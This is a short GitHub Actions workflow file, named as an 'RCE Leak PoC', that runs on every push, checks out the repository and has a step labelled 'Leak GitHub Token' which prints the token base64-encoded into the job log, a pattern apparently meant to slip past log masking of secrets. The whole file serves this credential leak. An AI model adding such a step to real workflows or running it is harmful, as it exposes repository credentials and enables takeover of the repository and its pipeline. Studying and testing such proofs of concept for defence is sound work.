name: RCE Leak PoC

on: [push]

jobs:
  leak:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2

      - name: Leak GitHub Token
        run: |
          echo "Leaking GITHUB_TOKEN:"
          echo "$GITHUB_TOKEN" | base64
